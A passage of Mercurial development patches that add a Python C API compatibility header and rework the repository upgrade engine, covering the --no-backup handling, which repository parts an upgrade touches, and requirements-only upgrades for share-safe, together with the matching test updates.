if (PyType_Ready(type) < 0) { + return -1; + } + + // inline _PyType_Name() + name = type->tp_name; + assert(name != NULL); + dot = strrchr(name, '.'); + if (dot != NULL) { + name = dot + 1; + } + + Py_INCREF(type); + if (PyModule_AddObject(module, name, (PyObject *)type) < 0) { + Py_DECREF(type); + return -1; + } + + return 0; +} +#endif + + +// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6. +// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2. +#if PY_VERSION_HEX < 0x030900A6 +static inline int +PyObject_GC_IsTracked(PyObject* obj) +{ + return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj)); +} +#endif + +// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6. +// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final. +#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0 +static inline int +PyObject_GC_IsFinalized(PyObject *obj) +{ + return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1)); +} +#endif + + +// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE) +static inline int +_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) { + return ob->ob_type == type; +} +#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type) +#endif + + +#ifdef __cplusplus +} +#endif +#endif // PYTHONCAPI_COMPAT diff --git a/mercurial/cext/osutil.c b/mercurial/cext/osutil.c --- a/mercurial/cext/osutil.c +++ b/mercurial/cext/osutil.c @@ -119,7 +119,7 @@ static void listdir_stat_dealloc(PyObject *o) { - o->ob_type->tp_free(o); + Py_TYPE(o)->tp_free(o); } static PyObject *listdir_stat_getitem(PyObject *self, PyObject *key) diff --git a/mercurial/cext/pathencode.c b/mercurial/cext/pathencode.c --- a/mercurial/cext/pathencode.c +++ b/mercurial/cext/pathencode.c @@ -21,6 +21,7 @@ #include <ctype.h> #include <stdlib.h> #include <string.h> +#include "pythoncapi_compat.h" #include "util.h" @@ -678,7 +679,7 @@ } assert(PyBytes_Check(ret)); - Py_SIZE(ret) = destlen; + Py_SET_SIZE(ret, destlen); return ret; } diff --git a/mercurial/pythoncapi_compat.h b/mercurial/pythoncapi_compat.h new file mode 100644 --- /dev/null +++ b/mercurial/pythoncapi_compat.h @@ -0,0 +1,278 @@ +// Header file providing new functions of the Python C API to old Python +// versions. +// +// File distributed under the MIT license. +// +// Homepage: +// https://github.com/pythoncapi/pythoncapi_compat +// +// Latest version: +// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h + +#ifndef PYTHONCAPI_COMPAT +#define PYTHONCAPI_COMPAT + +#ifdef __cplusplus +extern "C" { +#endif + +#include <Python.h> +#include "frameobject.h" // PyFrameObject, PyFrame_GetBack() + + +// Cast argument to PyObject* type. +#ifndef _PyObject_CAST +# define _PyObject_CAST(op) ((PyObject*)(op)) +#endif + + +// bpo-42262 added Py_NewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef) +static inline PyObject* _Py_NewRef(PyObject *obj) +{ + Py_INCREF(obj); + return obj; +} +#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-42262 added Py_XNewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef) +static inline PyObject* _Py_XNewRef(PyObject *obj) +{ + Py_XINCREF(obj); + return obj; +} +#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT) +static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt) +{ + ob->ob_refcnt = refcnt; +} +#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt) +#endif + + +// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE) +static inline void +_Py_SET_TYPE(PyObject *ob, PyTypeObject *type) +{ + ob->ob_type = type; +} +#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type) +#endif + + +// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE) +static inline void +_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size) +{ + ob->ob_size = size; +} +#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size) +#endif + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyCodeObject* +PyFrame_GetCode(PyFrameObject *frame) +{ + PyCodeObject *code; + assert(frame != NULL); + code = frame->f_code; + assert(code != NULL); + Py_INCREF(code); + return code; +} +#endif + +static inline PyCodeObject* +_PyFrame_GetCodeBorrow(PyFrameObject *frame) +{ + PyCodeObject *code = PyFrame_GetCode(frame); + Py_DECREF(code); + return code; // borrowed reference +} + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyFrame_GetBack(PyFrameObject *frame) +{ + PyFrameObject *back; + assert(frame != NULL); + back = frame->f_back; + Py_XINCREF(back); + return back; +} +#endif + +static inline PyFrameObject* +_PyFrame_GetBackBorrow(PyFrameObject *frame) +{ + PyFrameObject *back = PyFrame_GetBack(frame); + Py_XDECREF(back); + return back; // borrowed reference +} + + +// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyThreadState_GetInterpreter(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->interp; +} +#endif + + +// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyThreadState_GetFrame(PyThreadState *tstate) +{ + PyFrameObject *frame; + assert(tstate != NULL); + frame = tstate->frame; + Py_XINCREF(frame); + return frame; +} +#endif + +static inline PyFrameObject* +_PyThreadState_GetFrameBorrow(PyThreadState *tstate) +{ + PyFrameObject *frame = PyThreadState_GetFrame(tstate); + Py_XDECREF(frame); + return frame; // borrowed reference +} + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyInterpreterState_Get(void) +{ + PyThreadState *tstate; + PyInterpreterState *interp; + + tstate = PyThreadState_GET(); + if (tstate == NULL) { + Py_FatalError("GIL released (tstate is NULL)"); + } + interp = tstate->interp; + if (interp == NULL) { + Py_FatalError("no current interpreter"); + } + return interp; +} +#endif + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a6 +#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6 +static inline uint64_t +PyThreadState_GetID(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->id; +} +#endif + + +// bpo-37194 added PyObject_CallNoArgs() to Python 3.9.0a1 +#if PY_VERSION_HEX < 0x030900A1 +static inline PyObject* +PyObject_CallNoArgs(PyObject *func) +{ + return PyObject_CallFunctionObjArgs(func, NULL); +} +#endif + + +// bpo-39245 made PyObject_CallOneArg() public (previously called +// _PyObject_CallOneArg) in Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 +static inline PyObject* +PyObject_CallOneArg(PyObject *func, PyObject *arg) +{ + return PyObject_CallFunctionObjArgs(func, arg, NULL); +} +#endif + + +// bpo-40024 added PyModule_AddType() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline int +PyModule_AddType(PyObject *module, PyTypeObject *type) +{ + const char *name, *dot; + + if (PyType_Ready(type) < 0) { + return -1; + } + + // inline _PyType_Name() + name = type->tp_name; + assert(name != NULL); + dot = strrchr(name, '.'); + if (dot != NULL) { + name = dot + 1; + } + + Py_INCREF(type); + if (PyModule_AddObject(module, name, (PyObject *)type) < 0) { + Py_DECREF(type); + return -1; + } + + return 0; +} +#endif + + +// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6. +// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2. +#if PY_VERSION_HEX < 0x030900A6 +static inline int +PyObject_GC_IsTracked(PyObject* obj) +{ + return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj)); +} +#endif + +// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6. +// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final. +#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0 +static inline int +PyObject_GC_IsFinalized(PyObject *obj) +{ + return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1)); +} +#endif + + +// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE) +static inline int +_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) { + return ob->ob_type == type; +} +#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type) +#endif + + +#ifdef __cplusplus +} +#endif +#endif // PYTHONCAPI_COMPAT diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -11,6 +11,7 @@ > -X contrib/python-zstandard \ > -X hgext/fsmonitor/pywatchman \ > -X mercurial/thirdparty \ + > -X mercurial/pythoncapi_compat.h \ > | sed 's-\\-/-g' | "$check_code" --warnings --per-file=0 - || false Skipping contrib/automation/hgautomation/__init__.py it has no-che?k-code (glob) Skipping contrib/automation/hgautomation/aws.py it has no-che?k-code (glob) # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610621740 -19800 # Thu Jan 14 16:25:40 2021 +0530 # Node ID 2e8a844d0ae011806c16211e81eb4ad1e6969a6e # Parent e92ca942ddca2b10cd9ae1321dd0193203ca4d25 upgrade: don't create store backup if `--no-backup` is passed If the user explicitly mentioned that they don't need backup, then let's not create it. Differential Revision: https://phab.mercurial-scm.org/D9770 diff --git a/mercurial/upgrade.py b/mercurial/upgrade.py --- a/mercurial/upgrade.py +++ b/mercurial/upgrade.py @@ -118,6 +118,7 @@ up_actions, removed_actions, revlogs, + backup, ) if not run: @@ -215,12 +216,6 @@ backuppath = upgrade_engine.upgrade( ui, repo, dstrepo, upgrade_op ) - if not backup: - ui.status( - _(b'removing old repository content %s\n') % backuppath - ) - repo.vfs.rmtree(backuppath, forcibly=True) - backuppath = None finally: ui.status(_(b'removing temporary repository %s\n') % tmppath) diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -626,6 +626,7 @@ upgrade_actions, removed_actions, revlogs_to_process, + backup_store, ): self.ui = ui self.new_requirements = new_requirements @@ -670,6 +671,9 @@ b're-delta-multibase' in self._upgrade_actions_names ) + # should this operation create a backup of the store + self.backup_store = backup_store + def _write_labeled(self, l, label): """ Utility function to aid writing of a list under one label diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -412,7 +412,10 @@ """ # TODO: don't blindly rename everything in store # There can be upgrades where store is not touched at all - util.rename(currentrepo.spath, backupvfs.join(b'store')) + if upgrade_op.backup_store: + util.rename(currentrepo.spath, backupvfs.join(b'store')) + else: + currentrepo.vfs.rmtree(b'store', forcibly=True) util.rename(upgradedrepo.spath, currentrepo.spath) @@ -436,6 +439,8 @@ """ assert srcrepo.currentwlock() assert dstrepo.currentwlock() + backuppath = None + backupvfs = None ui.status( _( @@ -464,11 +469,16 @@ ui.status(_(b'data fully upgraded in a temporary repository\n')) - backuppath = pycompat.mkdtemp(prefix=b'upgradebackup.', dir=srcrepo.path) - backupvfs = vfsmod.vfs(backuppath) + if upgrade_op.backup_store: + backuppath = pycompat.mkdtemp( + prefix=b'upgradebackup.', dir=srcrepo.path + ) + backupvfs = vfsmod.vfs(backuppath) - # Make a backup of requires file first, as it is the first to be modified. - util.copyfile(srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires')) + # Make a backup of requires file first, as it is the first to be modified. + util.copyfile( + srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires') + ) # We install an arbitrary requirement that clients must not support # as a mechanism to lock out new clients during the data swap. This is @@ -485,7 +495,8 @@ ) ui.status(_(b'starting in-place swap of repository data\n')) - ui.status(_(b'replaced files will be backed up at %s\n') % backuppath) + if upgrade_op.backup_store: + ui.status(_(b'replaced files will be backed up at %s\n') % backuppath) # Now swap in the new store directory. Doing it as a rename should make # the operation nearly instantaneous and atomic (at least in well-behaved @@ -512,10 +523,11 @@ ) scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) - # The lock file from the old store won't be removed because nothing has a - # reference to its new location. So clean it up manually. Alternatively, we - # could update srcrepo.svfs and other variables to point to the new - # location. This is simpler. - backupvfs.unlink(b'store/lock') + if upgrade_op.backup_store: + # The lock file from the old store won't be removed because nothing has a + # reference to its new location. So clean it up manually. Alternatively, we + # could update srcrepo.svfs and other variables to point to the new + # location. This is simpler. + backupvfs.unlink(b'store/lock') return backuppath diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -632,11 +632,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for * (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ ls -1 .hg/ | grep upgradebackup [1] @@ -679,11 +677,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) Check that the repo still works fine @@ -759,11 +755,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -810,11 +804,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -861,11 +853,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -919,11 +909,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -978,11 +966,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1607943000 -19800 # Mon Dec 14 16:20:00 2020 +0530 # Node ID a83e1496d943ecaedfcb1614399eb47292ee4803 # Parent 2e8a844d0ae011806c16211e81eb4ad1e6969a6e actions: calculate what all parts does the operation touches To make upgrade work less in certain situations, we need to teach it to find out what all parts of repository current operation is touching. This patch starts doing that. In next patch we will be setting values in improvement objects. For now, we assume everything touches everything. Differential Revision: https://phab.mercurial-scm.org/D9771 diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -66,6 +66,18 @@ postdowngrademessage Message intended for humans which will be shown post an upgrade operation in which this improvement was removed + + touches_filelogs (bool) + Whether this improvement touches filelogs + + touches_manifests (bool) + Whether this improvement touches manifests + + touches_changelog (bool) + Whether this improvement touches changelog + + touches_requirements (bool) + Whether this improvement changes repository requirements """ def __init__(self, name, type, description, upgrademessage): @@ -75,6 +87,12 @@ self.upgrademessage = upgrademessage self.postupgrademessage = None self.postdowngrademessage = None + # By default for now, we assume every improvement touches + # all the things + self.touches_filelogs = True + self.touches_manifests = True + self.touches_changelog = True + self.touches_requirements = True def __eq__(self, other): if not isinstance(other, improvement): @@ -128,6 +146,12 @@ # operation in which this improvement was removed postdowngrademessage = None + # By default for now, we assume every improvement touches all the things + touches_filelogs = True + touches_manifests = True + touches_changelog = True + touches_requirements = True + def __init__(self): raise NotImplementedError() @@ -674,6 +698,72 @@ # should this operation create a backup of the store self.backup_store = backup_store + # whether the operation touches different revlogs at all or not + self.touches_filelogs = self._touches_filelogs() + self.touches_manifests = self._touches_manifests() + self.touches_changelog = self._touches_changelog() + # whether the operation touches requirements file or not + self.touches_requirements = self._touches_requirements() + self.touches_store = ( + self.touches_filelogs + or self.touches_manifests + or self.touches_changelog + ) + # does the operation only touches repository requirement + self.requirements_only = ( + self.touches_requirements and not self.touches_store + ) + + def _touches_filelogs(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_filelogs: + return True + for a in self.removed_actions: + if a.touches_filelogs: + return True + return False + + def _touches_manifests(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_manifests: + return True + for a in self.removed_actions: + if a.touches_manifests: + return True + return False + + def _touches_changelog(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_changelog: + return True + for a in self.removed_actions: + if a.touches_changelog: + return True + return False + + def _touches_requirements(self): + for a in self.upgrade_actions: + # optimisations are used to re-process revlogs and does not result + # in a requirement being added or removed + if a.type == OPTIMISATION: + pass + elif a.touches_requirements: + return True + for a in self.removed_actions: + if a.touches_requirements: + return True + + return False + def _write_labeled(self, l, label): """ Utility function to aid writing of a list under one label # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610623631 -19800 # Thu Jan 14 16:57:11 2021 +0530 # Node ID 60ea95471b83ea0551400c87849c106681598d27 # Parent a83e1496d943ecaedfcb1614399eb47292ee4803 upgrade: mark sharesafe improvement as only touching requirements Upgrading the repository to use share safe functionality only touches requirements. Differential Revision: https://phab.mercurial-scm.org/D9772 diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -291,6 +291,12 @@ b' New shares will be created in safe mode.' ) + # upgrade only needs to change the requirements + touches_filelogs = False + touches_manifests = False + touches_changelog = False + touches_requirements = True + @registerformatvariant class sparserevlog(requirementformatvariant): # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610625474 -19800 # Thu Jan 14 17:27:54 2021 +0530 # Node ID 8b02f132adf6ab669237de4d1a29a29433ed09d0 # Parent 60ea95471b83ea0551400c87849c106681598d27 test: unquiet few tests to demonstrate changes in upcoming patches Upcoming patches will skip revlog cloning for share-safe upgrades. Differential Revision: https://phab.mercurial-scm.org/D9773 diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -352,18 +352,45 @@ - changelog - manifest - $ hg debugupgraderepo --run -q + $ hg debugupgraderepo --run upgrade will perform the following actions: requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store added: share-safe + share-safe + Upgrades a repository to share-safe format so that future shares of this repository share its requirements and configs. + processed revlogs: - all-filelogs - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + migrating 6 total revisions (2 in filelogs, 2 in manifests, 2 in changelog) + migrating 626 bytes in store; 271 bytes tracked data + migrating 2 filelogs containing 2 revisions (138 bytes in store; 8 bytes tracked data) + finished migrating 2 filelog revisions across 2 filelogs; change in size: 0 bytes + migrating 1 manifests containing 2 revisions (230 bytes in store; 135 bytes tracked data) + finished migrating 2 manifest revisions across 1 manifests; change in size: 0 bytes + migrating changelog containing 2 revisions (258 bytes in store; 128 bytes tracked data) + finished migrating 2 changelog revisions; change in size: 0 bytes + finished migrating 6 total revisions; total change in store size: 0 bytes + copying phaseroots + data fully upgraded in a temporary repository + marking source repository as being upgraded; clients will be unable to read from repository + starting in-place swap of repository data + replaced files will be backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) + replacing store... + store replacement complete; repository was inconsistent for *s (glob) + finalizing requirements file and making repository readable again + removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + copy of old repository backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) + the old repository will not be deleted; remove it to free up disk space once the upgraded repository is verified repository upgraded to share safe mode, existing shares will still work in old non-safe mode. Re-share existing shares to use them in safe mode New shares will be created in safe mode. $ hg debugrequirements @@ -432,7 +459,7 @@ - changelog - manifest - $ hg debugupgraderepo -q --run + $ hg debugupgraderepo --run upgrade will perform the following actions: requirements @@ -444,6 +471,31 @@ - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + migrating 6 total revisions (2 in filelogs, 2 in manifests, 2 in changelog) + migrating 626 bytes in store; 271 bytes tracked data + migrating 2 filelogs containing 2 revisions (138 bytes in store; 8 bytes tracked data) + finished migrating 2 filelog revisions across 2 filelogs; change in size: 0 bytes + migrating 1 manifests containing 2 revisions (230 bytes in store; 135 bytes tracked data) + finished migrating 2 manifest revisions across 1 manifests; change in size: 0 bytes + migrating changelog containing 2 revisions (258 bytes in store; 128 bytes tracked data) + finished migrating 2 changelog revisions; change in size: 0 bytes + finished migrating 6 total revisions; total change in store size: 0 bytes + copying phaseroots + copying requires + data fully upgraded in a temporary repository + marking source repository as being upgraded; clients will be unable to read from repository + starting in-place swap of repository data + replaced files will be backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) + replacing store... + store replacement complete; repository was inconsistent for *s (glob) + finalizing requirements file and making repository readable again + removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + copy of old repository backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) + the old repository will not be deleted; remove it to free up disk space once the upgraded repository is verified repository downgraded to not use share safe mode, existing shares will not work and needs to be reshared. $ hg debugrequirements # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610622298 -19800 # Thu Jan 14 16:34:58 2021 +0530 # Node ID ee9002b9959566290a263493c409fcf7406df2b3 # Parent 8b02f132adf6ab669237de4d1a29a29433ed09d0 engine: add `if True` to prepare for next patch This will help making next patch easier to read. Differential Revision: https://phab.mercurial-scm.org/D9774 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -449,85 +449,90 @@ ) ) - with dstrepo.transaction(b'upgrade') as tr: - _clonerevlogs( - ui, - srcrepo, - dstrepo, - tr, - upgrade_op, - ) + if True: + with dstrepo.transaction(b'upgrade') as tr: + _clonerevlogs( + ui, + srcrepo, + dstrepo, + tr, + upgrade_op, + ) + + # Now copy other files in the store directory. + for p in _files_to_copy_post_revlog_clone(srcrepo): + srcrepo.ui.status(_(b'copying %s\n') % p) + src = srcrepo.store.rawvfs.join(p) + dst = dstrepo.store.rawvfs.join(p) + util.copyfile(src, dst, copystat=True) + + finishdatamigration(ui, srcrepo, dstrepo, requirements) + + ui.status(_(b'data fully upgraded in a temporary repository\n')) - # Now copy other files in the store directory. - for p in _files_to_copy_post_revlog_clone(srcrepo): - srcrepo.ui.status(_(b'copying %s\n') % p) - src = srcrepo.store.rawvfs.join(p) - dst = dstrepo.store.rawvfs.join(p) - util.copyfile(src, dst, copystat=True) + if upgrade_op.backup_store: + backuppath = pycompat.mkdtemp( + prefix=b'upgradebackup.', dir=srcrepo.path + ) + backupvfs = vfsmod.vfs(backuppath) - finishdatamigration(ui, srcrepo, dstrepo, requirements) + # Make a backup of requires file first, as it is the first to be modified. + util.copyfile( + srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires') + ) - ui.status(_(b'data fully upgraded in a temporary repository\n')) - - if upgrade_op.backup_store: - backuppath = pycompat.mkdtemp( - prefix=b'upgradebackup.', dir=srcrepo.path + # We install an arbitrary requirement that clients must not support + # as a mechanism to lock out new clients during the data swap. This is + # better than allowing a client to continue while the repository is in + # an inconsistent state. + ui.status( + _( + b'marking source repository as being upgraded; clients will be ' + b'unable to read from repository\n' + ) ) - backupvfs = vfsmod.vfs(backuppath) - - # Make a backup of requires file first, as it is the first to be modified. - util.copyfile( - srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires') + scmutil.writereporequirements( + srcrepo, srcrepo.requirements | {b'upgradeinprogress'} ) - # We install an arbitrary requirement that clients must not support - # as a mechanism to lock out new clients during the data swap. This is - # better than allowing a client to continue while the repository is in - # an inconsistent state. - ui.status( - _( - b'marking source repository as being upgraded; clients will be ' - b'unable to read from repository\n' - ) - ) - scmutil.writereporequirements( - srcrepo, srcrepo.requirements | {b'upgradeinprogress'} - ) - - ui.status(_(b'starting in-place swap of repository data\n')) - if upgrade_op.backup_store: - ui.status(_(b'replaced files will be backed up at %s\n') % backuppath) + ui.status(_(b'starting in-place swap of repository data\n')) + if upgrade_op.backup_store: + ui.status( + _(b'replaced files will be backed up at %s\n') % backuppath + ) - # Now swap in the new store directory. Doing it as a rename should make - # the operation nearly instantaneous and atomic (at least in well-behaved - # environments). - ui.status(_(b'replacing store...\n')) - tstart = util.timer() - _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op) - elapsed = util.timer() - tstart - ui.status( - _( - b'store replacement complete; repository was inconsistent for ' - b'%0.1fs\n' + # Now swap in the new store directory. Doing it as a rename should make + # the operation nearly instantaneous and atomic (at least in well-behaved + # environments). + ui.status(_(b'replacing store...\n')) + tstart = util.timer() + _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op) + elapsed = util.timer() - tstart + ui.status( + _( + b'store replacement complete; repository was inconsistent for ' + b'%0.1fs\n' + ) + % elapsed ) - % elapsed - ) - # We first write the requirements file. Any new requirements will lock - # out legacy clients. - ui.status( - _( - b'finalizing requirements file and making repository readable ' - b'again\n' + # We first write the requirements file. Any new requirements will lock + # out legacy clients. + ui.status( + _( + b'finalizing requirements file and making repository readable ' + b'again\n' + ) ) - ) - scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) - if upgrade_op.backup_store: - # The lock file from the old store won't be removed because nothing has a - # reference to its new location. So clean it up manually. Alternatively, we - # could update srcrepo.svfs and other variables to point to the new - # location. This is simpler. - backupvfs.unlink(b'store/lock') + if upgrade_op.backup_store: + # The lock file from the old store won't be removed because nothing has a + # reference to its new location. So clean it up manually. Alternatively, we + # could update srcrepo.svfs and other variables to point to the new + # location. This is simpler. + backupvfs.unlink(b'store/lock') + else: + pass return backuppath # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610622430 -19800 # Thu Jan 14 16:37:10 2021 +0530 # Node ID f2c4224e66483512d48997485114bf5c8a7e1080 # Parent ee9002b9959566290a263493c409fcf7406df2b3 upgrade: update only requirements if we can Upgrade operations which involves just upgrading requirements earlier used to go through whole revlog cloning business. Now we just upgrade the requirement and skip the cloning part. Differential Revision: https://phab.mercurial-scm.org/D9775 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- 